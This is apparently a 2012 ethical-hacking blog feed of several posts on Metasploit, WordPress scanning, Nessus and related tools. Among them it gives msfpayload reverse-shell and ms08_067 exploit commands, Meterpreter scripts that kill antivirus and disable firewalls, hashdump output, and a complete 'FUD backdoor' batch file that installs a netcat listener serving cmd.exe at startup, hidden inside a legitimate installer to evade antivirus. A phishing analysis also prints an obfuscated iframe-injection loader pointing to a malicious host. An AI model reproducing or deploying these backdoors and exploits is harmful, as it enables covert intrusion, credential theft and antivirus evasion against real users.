Ethical Hacking-Your Way To The World Of IT Security

Credentials Sniffing Psnuffle Metasploit Tutorial

noreply@blogger.com (Irfan Shakeel) — Sun, 27 May 2012 11:24:00 +0000

Metasploit is a very powerful penetration testing software and framework, metasploit has so many exploits and auxiliary modules that can perform so many tasks. There are so many auxiliary modules are available and this is the video tutorial made by mAx and I am just sharing the video tutorial. The video is the demonstration of credential sniffing via metasploit Psnuffle auxiliary module.

Psnuffles metasploit auxiliary module is able to sniff the credentials of HTTP,FTP,POP3 and IMAP. So below is the video do not forger to share in via your social media profiles.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.

Wordpress Security - Vulnerability Scanning

noreply@blogger.com (Irfan Shakeel) — Thu, 24 May 2012 15:12:00 +0000

WordPress is one of the best and most popular content management system (CMS) among bloggers and there are a lot of bloggers using WordPress as a CMS. Wordpress is on the hit list of the hackers and spammers, spammers use their malware to compromise a wordpress website that is why reverse engineering of malware is necessary.

However there are other CMS available, like Joomla!, but WordPress has its own importance and market. Since most bloggers are using WordPress the security is also important and a single dangerous vulnerability may lead to thousands of compromised WordPress blogs. From the penetration tester point-of-view an administrator must be aware at the system level, as well as the application level, of existing vulnerabilities in order to protect these website(s).

We provide our services to secure a wordpress website / blog more information.

A quick tip to secure a WordPress (or any other) blog from the system/server software vulnerability is by auditing. This includes keeping up-to-date all the server’s software, browsers, anti-virus, using strong passwords and changing them very often, scanning the server for malware and backdoors, using firewalls, etc.,. WordPress software itself has different vulnerabilities; in fact security researchers discover new vulnerabilities on a daily basis.

So in this article we will cover some tools and plug-ins to audit WordPress software for security holes and vulnerabilities. We will also discuss the possible ways and tools that an attacker might use to hack into WordPress, and some of the best way(s) to secure a WordPress blog.

WordPress Security Audit & Vulnerability Scanning

A security audit is one of the most important steps to finding possible vulnerabilities in WordPress and in this section I will discuss some tools and plug-ins you can use to find them.

Plecost WordPress Fingerprinting Tool:

Plecost is a wonderful tool to audit a WordPress blog and it is available by default on the most famous penetration test tools i.e., Backtrack, Backbox and Blackbuntu. Plecost contains a database of available plug-ins and compares them against the common vulnerability and exposure (CVE) list to verify its vulnerability on WordPress.

Plecost can work in two modes – either by auditing the security of a single targeted URL or Google search results. Our goal is to audit a single URL.

Here is the result of a quick and a simple audit on WordPress using Plecost.

root@bt:/pentest/web/scanners/plecost# ./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt -c http://127.0.0.1/wordpress

-------------------------------------------------

[*] Input plugin list set to: wp_plugin_list.txt

[*] Colored output set on.

-------------------------------------------------

==> Results for: http://127.0.0.1/wordpress <==

[i] WordPress version found: 3.3

[i] WordPress last public version: 3.3.1

[*] Search for installed plugins

[i] Plugin found: akismet

|_Latest version: 2.4.0

|_ Installed version: 2.3.0

|_CVE list:

|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)

|___CVE-2007-2714: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2714)

|___CVE-2006-4743: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4743)

|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)

|___CVE-2007-2714: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2714)

|___CVE-2006-4743: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4743)

[i] Plugin found: wp-security-scan

|_Latest version: 2.7.1.2

|_ Installed version: trunk

|_CVE list:

|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)

|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)

You can see that this WordPress software is outdated. The new version of WordPress is available and the new version of the plug-ins are also available, but they have not been updated. This is dangerous.

The next article of this series will be publish soon, do not forget to share this information.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.

Metasploit Meterpreter Scripting Backtrack 5 Tutorial

noreply@blogger.com (Irfan Shakeel) — Fri, 18 May 2012 19:49:00 +0000

Information security is a broad field and it involves the penetration testing and computer forensic as well, there are so many tools are available to perform the penetration testing on the target, Metasploit is one of the best tool among them. Meterpreter is a powerful feature of metasploit that uses DLL injection to communicate over the socket. Meterpreter works on the client-side by providing a powerful environment to communicate, to transfer files.

A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:

Capture the screen
Keylogging
File transfer
Service detection and more

Even with numerous meterpreter scripts available, you are free to write and to create your own script that is best suited to your work. Some important aspects about the meterpreter script would be:

Written in Ruby programming language
Located in the metasploit directory
Meterpreter scripts are creating everyday by different authors click here to check the list.
Meterpreter scripts are very helpful to automate the process after compromising the host
Meterpreter scripts are based on API and you can get more information here.

There are so many meterpreter scripts that are available publicly for you to use, but if you want to create a new meterpreter script of your own and for public usage, this is readily doable. All you need to do is to follow some rules and regulations so that your script does not conflict with the standard variables. Ruby programming language is a basic need in order to write a script for meterpreter. Other important rules to follow are:

Always use description so that the others will understand it
Use local variable not global variable
Always provide help option for better usage
Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities

Let us consider an example: in our scenario, we need to create an infected file (a backdoor) so that we can send it to the victim. Metasploit needn’t be that big of a deal; you can even create a backdoor by using fast-track.

root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}

As we have typed all the things in, we can automate the process by creating a new script:

root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#

The result is the same. It is also possible to create a jpg file but that method is fast. Since the time-consuming method is repeating the same step, why not create a script for that to do all these jobs automatically? There are different meterpreter scripts are available; just look at the picture below.

This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:

root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc

Beyond this, if we use the manual technique to do then job, then we will need to define:

The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
We need to set the remote host manually
We need to set local host and port manually

After the execution, the meterpreter session must be active if and only if the operating system is vulnerable, such as in this case:

Now in this meterpreter session, we are able to call different scripts. We can also create our own script as well, as discussed above. Below, I will show you some of the best meterpreter scripts. These are highly useful in the process of penetration testing; however, developers are refining these scripts daily, so be active in the community and on different blogs and forums to keep yourself updated.

Screenspy Script

This is the basic script that will capture the screen of the victim’s computer. All you need to do is type in “run screenspy.” To get help of usage, just type in “run screenspy -h” on the meterpreter screen. After the execution, Firefox will open with a picture of the victim’s computer at that moment.

KillAv Script

Killav script is a pretty famous script. As the name suggests, it will kill (close) antivirus softwares, so if you don’t want that antivirus’ software to disturb you, be sure to kill all of these antivirus softwares by using this script:

meterpreter > run killav
  [*] Killing Antivirus services on the target...
  meterpreter >

Killav contains the information on most of the better known anti-virus’s, but if there is a new anti-virus, then you will need to edit this script for the best performance. As before with the script file, we can find the famous anti-virus exe name:

winppr32.exe
winrecon.exe
winservn.exe
winssk32.exe
winstart.exe
winstart001.exe
wintsk32.exe
winupdate.exe
wkufind.exe
wnad.exe
wnt.exe
wradmin.exe
wrctrl.exe
wsbgate.exe
wupdater.exe
wupdt.exe
wyvernworksfirewall.exe
xpf202en.exe
zapro.exe
zapsetup3001.exe
zatutor.exe
zonalm2601.exe
zonealarm.exe

Getcountermeasure Script

Killav is a power script and it can kill a lot of different anti-virus’s, but the problem is that when you implement killav, windows may show some types of errors and other alerts, not to mention firewalls. This is remedied by a wonderful script called Getcountermeasure:

meterpreter > run getcountermeasure -h
  Getcountermeasure -- List (or optionally, kill) HIPS and AV
  processes, show XP firewall rules, and display DEP and UAC
  policies

  OPTIONS:

  -d Disable built in Firewall
  -h Help menu.
  -k Kill any AV, HIPS and Third Party Firewall process found.

Just imagine how powerful this script is! It has an ability to fight against Firewall, Anti-virus, IPS and even third party firewall that are so very common nowadays. It is really better than Killav. To use it:

meterpreter > run getcountermeasure -d 

  [*] Running Getcountermeasure on the target...
  [*] Checking for contermeasures...
  [*] Getting Windows Built in Firewall configuration...
  [*]
  [*]     Domain profile configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]     Exception mode = Enable
  [*]
  [*]     Standard profile configuration (current):
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Disable
  [*]     Exception mode = Enable
  [*]
  [*]     Local Area Connection firewall configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]
  [*] Disabling Built in Firewall.....
  [*] Checking DEP Support Policy...

Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.

Gettelnet script

Telnet is one of the most famous services on the windows operating system. It will allow a remote connection, so if you want to open telnet on the victim’s computer for future use, then it is a good script to use. However, as an advance we can use SSH service for remote connection. We can also install netcat as a backdoor on a compromised host for future connections. Use this command to get more help

  meterpreter > gettelnet -h

There are a lot of different scripts are available but here we will discuss only the most important ones. These will help you to understand the network as well as help you for future connections:

Net Enum- Network Enumeration Script

Netenum is a network enumeration script that is a wonderful script for:

Domain Name for DNS Forward Lookup
To Perform DNS Forward Lookup on host list and domain
The target address range or CIDR identifier
To Perform DNS lookup of MX and NS records for a domain
To Perform Service Record DNS lookup for a domain
To Perform Ping Sweep on IP Range

Checkvm- Check Virtual Machine

Virtual machines are now an important part of enterprise network and most of the large (and even small) networks are using them. Checkvm is a script that will let you monitor the status of the victim, whether on virtual machine or not. It will also let you see the type of virtual machine. Here is the output of this case:

 meterpreter > run checkvm
  [*] Checking if target is a Virtual Machine .....
  [*] This is a Sun VirtualBox Virtual Machine
  meterpreter >

Virus Scan Bypass

Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder, adds it to exclusion list and sets it to run at startup. Though we have discussed two scripts that kill anti-virus protections, it is good to run different scripts to verify your attack.

  meterpreter > run virusscan_bypass -h

Enable RDP- Getgui

If you want a graphical user interface of the victim’s computer, then you need to open a service called RDP (remote desktop protocol):

  meterpreter > run getgui -e
  [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  [*] Carlos Perez carlos_perez@darkoperator.com
  [*] Enabling Remote Desktop
  [*]     RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode

Hashdump

Last but not the least: I really don’t want to end this article without sharing hashdump, in case you want to secure password hashes from the victim for future use. In some cases, these hashes works on other platforms:

 meterpreter > run hashdump
  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::

If you have some other wonderful scripts, please share with in the comments!

Backup & Restore Your Wi-Fi Passwords

noreply@blogger.com (Irfan Shakeel) — Thu, 10 May 2012 19:15:00 +0000

By default all operating systems, including Linux, save passwords of previously connected Wi-Fi access points. There are ways to export these saved passwords to be used in other computers. Third party software like LastPass and WirelessKeyView can save your saved passwords, and import them to other computers. Mac users can use LastPass and 1Password to save their passwords, including Wi-Fi passwords.

Windows 7

Windows 7 by default saves the password that you enter while connecting to internet through Wi-Fi. Saved passwords can be backed up in a USB drive, but the only drawback is that passwords have to be exported one at a time for each Wi-Fi network. To save a Wi-Fi key/password, click on the wireless network symbol on the taskbar and click the Open Network and Sharing Center. In the Network Sharing Center window, click on Manage Wireless Network and you will see all your wireless networks listed in the Manage Wireless network window. Double click on the network that you want to export, and you will be taken to the properties page; in the properties page, select the option Copy this network profile to a USB flash drive. Follow the setting wizard instructions and you are good to go. The USB drive will have the setupSNK.exe file and a SMRTNTKY folder.

Use the USB drive to import the settings to different computers having Windows software (XP, Vista, 7).
To import the settings insert the USB device in your computer and run the setupSNK.exe file. On clicking the setupSNK.exe file, you will be prompted by a message window. Click yes to download the settings on to your computer.

LastPass

LastPass is utility software that manages passwords, be it for websites or Wi-Fi networks. Best part of LastPass is that it installs on to the browser as an extension. It has a feature to export and import Wi-Fi passwords; this feature is only available in version 1.9 or higher. You may need to run the Universal Installer to download this feature. When encountered with an error simple follow on screen instructions to run the Universal Installer. Passwords are saved into the LastPass Vault, which is sync with your computer.

Open your web browser and click the LastPass button. Select tools and go to Import From. Then click Wi- Fi Passwords and click Import in the new tab to save the saved Wi-Fi settings from your computer. You can use the check boxes to select networks that you want to import. Log on to LastPass from a different computer and select Export To (below Import From) and then Wi-Fi Passwords to download the settings on to your computer.

1Password

Similar to LastPass, 1Password is a password manager that saves and generates passwords. It’s available for Windows, Mac, Ipad and Android. Mac users have the option to use either Wi-Fi or Dropbox to sync their data with 1Password manager. Windows users just need to use Dropbox to sync all their data.

Ipad users can use the option Backup & Restore to backup their data. To do so, open 1Password and select Settings> Data> Backup & Restore. Remember that both your computer and IOS should be on the same Wi-Fi network to perform this process. Apple doesn’t allow third party apps to sync via USB drive.

WirelessKeyView

This software recovers all the stored wireless network keys/passwords in your computer. You can save the information in text/html/xml file. Best thing about this software is that it’s a freeware, unlike LastPass and 1Password. Be sure to download the latest version to get all the options. This software only works on Windows machine, starting from Windows XP.

Download the software from Nirsoft’s website and double click the .exe file. On start up, the program will show all saved wireless passwords in a list form. You can save the network that you want to export in to a text file by selecting Save Selected Items from file menu.

All above software products provide a myriad of features; however, WirelessKeyView only provides basic features like converting information regarding wireless network settings into text files. LastPass is the most versatile in respect to platform, because any operating system that can run Mozilla Firefox web browser can use LastPass; the software just installs an extension for the browser and supports Internet Explorer, Chrome and Firefox. Windows 7 user can rejoice as it has the option to export wireless network information on USB drive, and they don’t need to download anything extra for exporting Wi-Fi
passwords.

About the author: Margaret is a blogger by profession. She loves writing on environment and automotto. Beside this she is fond of books. She recently did an article on Concrete Walls. These days
she is busy in writing an article on autos india.

SQLSentinel - SQL Injection Vulnerability Scanner

noreply@blogger.com (Irfan Shakeel) — Mon, 07 May 2012 15:24:00 +0000

SQL injection is the most dangerous and common web application attack, there are so many tools are available to exploit the SQL-injection vulnerability like Havij and SQLmap but to find a vulnerability is an important step to exploit the web application. So in this article we will discuss about a wonderful tool that can find the SQL-injection vulnerability on a web application.

SQLSentinel is an opensource tool that automates the process of finding the sql injection on a website. SQLSentinel includes a spider web and sql errors finder. You give in input a site and SQLSentinel crawls and try to exploit parameters validation error for you. When job is finished, it can generate a pdf report which contains the url vuln found and the url crawled.

Please remember that SQLSentinel is not an exploiting tool. It can only finds url Vulnerabilities.

Find the SQL-injection vulnerability and then exploit the vulnerability by using the famous SQL-injection tool, SQLSentinel is a very easy tool to use.

SQLSentinel Tutorial

Go and download the tool here.
Extract it on your directory.
In my case I am on backtrack 5 based on Ubuntu.
Simply open the terminal and then locate the directory where you have extracted the tool before.
It is a Java dependent so use the command as:

root@bt:~/Desktop# java -jar sqlsentinel.jar

Do not forget to share this wonderful tool around your circle.

Post Exploitation & Meterpreter Scripting -Metasploit

noreply@blogger.com (Irfan Shakeel) — Sat, 05 May 2012 16:45:00 +0000

Metasploit has now become the king of tools used in penetration testing. It’s comprised of a collection of all available exploits. The tool has its pros and cons; some advantages are:

It automates the process of penetration testing

Fast (less time require)

Reliable

It offers a lot of advanced features that we will discuss step by step

Just as a comparison between automatic and manual penetration testing and vulnerability assessment approaches: the automatic process is fast but in some cases does not give the desired result. Manual testing is slow, but more precise and we cannot neglect it. As far as disadvantages go, metasploit does not have one, excepting the possibility that automatic tools do not always work. The point being, metasploit only has the available exploits. If the server’s software is fully patched, then metasploit would fail. (There are many methods of using metasploit. Here, “fail” means to exploit the available vulnerability.) This being the case, we will surely need to implement a manual test to find the 0-day vulnerability. This then is the weakness of metasploit. However, metasploit is the hot topic among penetration testers, and many advances have been made. The security community is currently working to make metasploit even more useful.

Metasploit is based on module system. From this point onward, I will assume that you are aware of basic usage of metasploit, like about msfconsole, meterpreter, exploits, payload and auxiliary module.

Post Exploitation

The main objective in discussing post exploitation is to cover meterpreter scripting. Post exploitation is the technique/ method /procedure or standard to identify and to monitor a target host, to find the way of future access.

What is post exploitation? Why is post exploitation important? Some of these questions are important to understand the phenomena, so let us suppose you have successfully hacked (compromised) a host, but you want to use this session for some other time. It is not a good practice to start things all over again. Moreover, what of you fail next time? Therefore, the best method is to prepare the compromised system for the next use. The other phase of post exploitation is to use the compromised host as an attacker machine and to attack on some other host or network via this compromised machine. Consider the picture below:

Now the above diagram shows the importance of post exploitation. Let us suppose that an attacker has successfully compromised the victim A. Now, the attacker wants to go on the web server, so for victim A, the web server is on the network. To hack on the same network is very easy: instead of a remote attack for this purpose, the attacker can use victim A as its own machine to attack on the network. This is what’s known as the post exploitation phase.

To conclude, the post exploitation attack is the process of:

Infrastructure analysis
Routing analysis
Protocol analysis
DNS server analysis
ARP analysis
Proxy server analysis
Host machine analysis (virtual or real host)
Services and software’s analysis
Sharing analysis
Directory, name server and certificates analysis
Backup and patch management analysis

To be continued :
This is an introductory part of the article that discuss the foundation of post exploitation, in the next article of this series we will discuss the practical of meterpreter scripting. Stay update and do not forget to share.

Subterfuge - Man-in-the-Middle Attack Framework Tutorial

noreply@blogger.com (Irfan Shakeel) — Mon, 30 Apr 2012 21:10:00 +0000

Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions.

Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool.

The video below show you how to configure subterfuge on your computer, the operating system shown in the video is backtrack 5 but you can install subterfuge in other Linux distribution because subterfuge install dependencies by itself.

So this is a small video in the subterfuge tutorial I will show you how to perform the various attack. Do not forget to comment about this wonderful tool and do not forget to share your experiences regrading the framework.

How to Create a FUD Backdoor – Bypass An Antivirus

noreply@blogger.com (Irfan Shakeel) — Wed, 25 Apr 2012 15:38:00 +0000

How to bypass an Anti-virus or how to create a FUD (fully undetectable) backdoor is not a new topic of discussion, the need to bypass an antivirus is very high because it is very helpful in the process of penetration testing and ethical hacking. You can bypass an antivirus by using the metasploit encoders and there are many other ways, in this tutorial I will show you how to make your ncat FUD and how to use the netcat as a backdoor.

As rcat is a good replica of Netcat and has an ability to bypass most of the antivirus, then why not wrap it up with another file (that must not a backdoor)?
To do this we use a simple technique:

Create a batch file that will add your Netcat into the system folder and can edit the registry of the windows. Wait you don’t need to create it because I did it for you.

@echo off
copy rcat.exe %systemroot%\system32\rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\rcat.exe -L -d -p 4444 -t -e cmd.exe"
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
nc -L -p 4444 -t

Open a notepad and than save it to name.bat
Download rcat and then copy rcat.exe into the same directory where name.bat exist
Now we use winrar to combine these two file, select both and then right click on add to archive

On the next window mark check on create SFX archive
Go to advance tab and click on SFX option
Fill out the options like at the figure below

Change the tab to modes and place mark of hide all
Almost done click OK than OK to create a file
New file must be appear at the same directory
We have combined it but now make it more compitable
Click on the start than run and type iexpress
iexpress wizard will start, click on next, then next (leave it as default), and then where it ask about package title write any title like test
On the next two window click leave as a default and then you need to add your files.
You need to add two files like I did (see figure below) one must a .exe file that we have made by using above method and the second file will be any setup file. iexpress combines them to make one.

On the next window there will be two options, on the install program select the simple setup and on the post install command select the backdoor.
On the next window place mark on hidden then click next
Enter the name of the final file and place mark on first option (see figure below )

On next window no restart and
then don’t save, on the last create the package.
Your new file must be appear on the same directory and here is the report.
New file has an ability to bypass the most famous antivirus software and it has contained our back door.

Result

Let’s suppose our victim has executed the file. Now we can easily get the response via our command promote or terminal.

root@bt:~# telnet 192.168.1.8

Trying 192.168.1.8...

telnet: Unable to connect to remote host: Connection refused

root@bt:~# telnet 192.168.1.8 23

Trying 192.168.1.8...

telnet: Unable to connect to remote host: Connection refused

Why does it fail? Because our Netcat opened port number 4444. Look at the batch file code. Now check again.

root@bt:~# telnet 192.168.1.8 4444

Trying 192.168.1.8...

Connected to 192.168.1.8.

Escape character is '^]'.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Blacksheep>

You can use nc instead of telnet.

AnonBin The Anonymous Alternate of Pastebin

noreply@blogger.com (Irfan Shakeel) — Sun, 22 Apr 2012 19:02:00 +0000

Anonymous the famous hacktivist group has announced the alternate of pastebin, a pastebin is web application that allows you to paste and share the text file. The official release of Anonymous and the Peoples Liberation Front states that:

Anonymous and the Peoples Liberation Front are proud to announce a totally secure and safe alternative to the now infamous PasteBin service.

AnonPaste - www.AnonPaste.tk

As many might be aware, PasteBin has been in the news lately for making some rather shady claims as to what they are willing to censor, and when they are willing to give up IP addresses to the authorities. And as a recent leak of private E-Mails show clearly, PasteBin is not only willing to give up IP addresses to governments - but apparently has already given many IPs to at least one private security firm. And these leaked E-Mail's also revealed a distinct animosity towards Anonymous. And so the PLF and Anonymous have teamed up to offer a paste service truly free of all such nonsense. Here is a brief list of some of the features of AnonPaste:

1) No connection logs, period.

2) All pastes are encrypted BY THE BROWSER using 256 bit AES encryption. This means there is no usable paste data stored on the server for the authorities or anyone else to seize.

3) No moderation or censorship. Because the data on our servers is unreadable by us (or anyone), the responsibility for the legality or appropriateness of any paste lies solely with the person posting. So there will be no need for us to police this service, and in fact we don't even have the ability of deleting any particular paste.

4) No advertisements. This service will be totally user supported through donations. Links for this are available on the web site.

5) Built in URL shortener for the convenience of people posting.

Paste services have become very popular, and many people want to post controversial material. This is especially so for those involved in Information Activism. We feel that it is essential that everyone, and especially those in the movement - have a safe and secure paste service that they can trust with their valuable and often politically sensitive material. As always, we believe in the radical notion that information should be free.

SIGNED -- Anonymous and the Staff of the Peoples Liberation Front PLF - www.PeoplesLiberationFront.net

Here are 2 links to it.

http://expect-us.net/paste/

or

http://anonbin.tk/

PayPal & Wire Transfer Scam - Email Scam

noreply@blogger.com (Irfan Shakeel) — Sat, 21 Apr 2012 15:45:00 +0000

Scammer are active and they usually active to make an innocent fool and to steal the confidential information and money, every day thousands of email are sending by the spammer an email filter can easily filter these email and spam them like the powerful spam filter of gmail and yahoo but sometimes the spammers uses some new techniques to bypass these filters. Now a day the private email exchange server (private company email servers) are the target of these spammers.

You might have heard about the spamming on social media channels like facebook spam, LinkedIn spam and so on, the danger situation is the spam email that has an ability to steal the financial information of the victim, look at this scam below

I have just received an email, a paypal spam email. We can easily say that this is not a legitimate email because it starts with “Dear Pay Pal user” but paypal always writes the name of the customer. You can see that the spammers has just put the hyper link on some text, the links are not the paypal links but the spammer website links, the target website might have some malware or a phishing page of paypal or it simply redirect you to another website.

The second email from the spammer is wire transfer email, look at the picture:

The spammers has attached a HTML file and said that this is the Internet explorer file, means they want receiver to open it on Internet explorer, since IE more vulnerable then other browsers so the more chance of success.

Lets analyze it:

This is the HTML file that contain the code:

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>page15</title> </head> <body><style> body { margin: 0;} #iframe_box {position: absolute; overflow: auto; margin: 0; width: 100%; height: 100%;} </style> <script>c=3-1;i=-2+c;if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){if(window.document)f=['-30i78i57i74i-8i58i71i80i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i-8i-30i58i71i80i6i65i60i-8i21i-8i-1i65i62i74i57i69i61i55i58i71i80i-1i19i-8i-30i58i71i80i6i75i74i59i-8i21i-8i-1i64i76i76i72i18i7i7i79i65i75i67i71i70i75i65i70i76i72i57i74i57i6i74i77i18i16i8i16i8i7i65i69i63i7i23i72i74i71i69i71i21i70i57i59i64i57i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i75i76i81i68i61i6i71i78i61i74i62i68i71i79i-8i21i-8i-1i64i65i60i60i61i70i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i57i72i72i61i70i60i27i64i65i68i60i0i58i71i80i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;204!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);} if(v)z=s;e(z);</script></body> </html>

It seems to be the Java code and I have decrypted it:

//eval var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box); //jsunpack.called CreateElement iframe //jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha //jsunpack.url var s = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box); //jsunpack.url var z = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box); //jsunpack.url var newurl = var box = document.createElement('iframe'); box.id = 'iframe_box'; box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; document.body.style.overflow = 'hidden'; document.body.appendChild(box);

It is some sort of the iframe injection attack and the final destination or URL is

//jsunpack.called CreateElement iframe //jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha

It is not a bank website but a URL of the malicious website.

So the conclusion is very simple never trust on any malicious email because such a emails are nothing but a way to steal your money, educate the people around you because the security awareness is only the possible way of online security.

Vulnerability Assessment & Scanning Nessus Tutorial

noreply@blogger.com (Irfan Shakeel) — Mon, 16 Apr 2012 15:14:00 +0000

This is the second part of IT auditing and fundamentals, the first part of this article has been discussed on the previous issue.

What is nessus? What nessus can do ? And other similar question has been discussed above but from this point I will demonstrate you the best feature of nessus with some examples. Keep in mind that nessus are available into two feeds one is a home feed while other is for professional (you need to purchase it), figure 6 show you to simple interface of nessus.

Whether you are using home feed or professional feed there is a four policies exist by default and they are:

Eternal network scan
Internal network scan
Prepare for PCI DSS audit
Web app test

This is not enough and nessus are not bound you within these policies nessus provide a feature to create your own policy according to your requirement of the test. In the figure below demonstrate that I have edited the default policies and even I have created a new policy according to my requirement.

Now we can easily edit the policies and while editing the policies you can check the best scan type, port scanner and performance.

TCP scan: If you want nessus to scan TCP open ports than check on this option.
UDP scan: Same for UDP port scan just mark check.
Ping host: Ping is just to test the host is alive or not
SNMP scan: It will direct nessus to scan target of SNMP service
Netstat SSH scan: It will tell nessus to scan a open port by using Netstat command
You can set of the port range to scan.
The other setting is very simple but it is a best practice to remains these default, even you can change the performance like if you are going to conduct a test on a enterprise network that has above 100 host than change the maximum host per scan setting.

The next window is about the credentials.

You can set the credential type like:

Windows credentials
SSH settings
Clear text protocol settings
More

The third window is to set plug ins, nessus contain a wide range of plug ins like :

Backdoors
CISCO
CGI scanning
Web server scanning
RED HAT
Windows
SMTP
More

Plug ins are the wonderful feature that will let an auditor to choose the best plug in according to the requirement of the test.

The last windows is about preferences, now in this point you can choose plugin setting like if you want to conduct an audit on Oracle database than choose oracle setting with oracle SID and so on.

Network Vulnerability Scanning Example Test

Now let suppose an auditor have to test the internal network, for this purpose nessus internal network scan policy is the best choice for a test behind a firewall, if you have a default plug in setting than it is a best. Keep in mind that in the internal test enable all the plug ins.

On the scan menu add a new scan.

Here I am using internal scan policy while in the scan range I have choose all the host from this subnet of class C IP. Launch a scan and it takes some time depending on the number of host.

Here is the report

It shows that there is a four host alive and they contain a lot of vulnerabilities even some vulnerabilities are at high risk but keep in mind that all the exploits against a vulnerability is not available on public, so how to check the available exploit against a vulnerability? It is very simple from the left side below click on show filter than mark a check on exploit exist.

Now the exploits of these vulnerabilities are available in public and we can see the detail of this exploits like CVE information, vulnerability publication date and more information.

Lets call a result of Zenmap you can integrate nmap (zenmap) result into nessus for the maximum performance that is why I have discussed zenmap before. On the scan windows of nessus simply browse the target file and import nmap result into nessus.

Its all done and I hope you have enjoyed it.

web-sorrow Web Server Scanner & Enumeration

noreply@blogger.com (Irfan Shakeel) — Fri, 13 Apr 2012 14:47:00 +0000

